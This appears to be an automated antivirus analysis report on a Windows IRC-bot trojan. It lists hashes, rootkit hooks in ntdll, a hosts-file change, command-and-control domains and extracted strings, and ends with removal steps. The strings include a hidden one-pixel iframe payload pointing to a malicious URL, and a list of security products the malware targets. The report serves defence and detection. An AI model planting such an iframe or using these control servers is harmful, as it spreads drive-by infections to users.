MD5: b476bf040e386ee0098c5dbf4a933dca
SHA1: 811edcf19c9f3bff9f3de75e325360158ef4e261
SHA256: 9aa5945ce3c1166d8b0b083d5e0a433d9b0c80a82b70727c55a6856684a2d339
SSDeep: 3072:jYrpJSccsWlXCFLcVygpgMbcLHCbyJ3xSlV mHi4h36JltZrpRn73DTtLJF53u2I:jepwDCabG3ExHiC3uthpBVJF5 2 mQ
Size: 253468 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2004-09-12 12:55:29
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2180

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

No files have been created.

Registry activity

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
teredo.ipv6.microsoft.com	157.56.106.189
sys.zief.pl	148.81.111.121
dns.msftncsi.com	131.107.255.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Reply Sinkhole - irc-sinkhole.cert.pl

Traffic

The Trojan connects to the servers at the folowing location(s):

`.rsrc

D$(PSSh

ccRegVfy.exe

ccApp.exe

IEXPLORE.EXE

windows

\*.exe

.text

.data

.rsrc

msvcrt.dll

KERNEL32.dll

nddeapir.pdb

_acmdln

m.Zw%

ADVAPI32.DLL

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

Qoysys.zief.pl

core.ircgalaxy.pl

NICK avabcadz

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x %s

JOIN

127.0.0.1 jL.chura.pl

#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>

KERNEL32.DLL

windowsupdate

drweb

user32.dll

kernel32.dll

MSVCIRT.dll

MSVCRT.dll

5.1.2600.0 (xpclient.010817-1148)

NDDEAPIR.EXE

Windows

Operating System

5.1.2600.0

%original file name%.exe_2180_rwx_00401000_00002000:

D$(PSSh

%original file name%.exe_2180_rwx_00419000_00005000:

ADVAPI32.DLL

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

Qoysys.zief.pl

core.ircgalaxy.pl

NICK avabcadz

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x %s

JOIN

127.0.0.1 jL.chura.pl

#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>

KERNEL32.DLL

windowsupdate

drweb

b476bf040e386ee0098c5dbf4a933dca.usr_3436:

.text

.data

.rsrc

comdlg32.dll

SHELL32.dll

WINSPOOL.DRV

COMCTL32.dll

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

GDI32.dll

USER32.dll

%.wX!/w

notepad.chm

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

notepad.pdb

t%SSh

_acmdln

RegCloseKey

RegCreateKeyW

RegOpenKeyExA

SetViewportExtEx

GetKeyboardLayout

name="Microsoft.Windows.Shell.notepad"

version="5.1.0.0"

<description>Windows Shell</description>

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

&*$#$$#$*

MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM

*.txt

/.SETUP

Text Documents (*.txt)

5.1.2600.0 (xpclient.010817-1148)

NOTEPAD.EXE

Windows

Operating System

5.1.2600.0

notepad.hlp

You cannot quit Windows because the Save As dialog

dialog box, and then try quitting Windows again.

Common Dialog error (0xx)

Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.

Not a valid file name.MCannot create the %% file.

Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.

Page %d

Ln %d, Col %d

b476bf040e386ee0098c5dbf4a933dca.usr_3436_rwx_01001000_00001000:

%.wX!/w

notepad.chm

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

notepad.pdb

*.txt

/.SETUP

b476bf040e386ee0098c5dbf4a933dca.usr_3436_rwx_01012000_00006000:

Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.

Not a valid file name.MCannot create the %% file.

Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.

Page %d

Ln %d, Col %d

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
3. Delete the original Trojan file.
   
4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.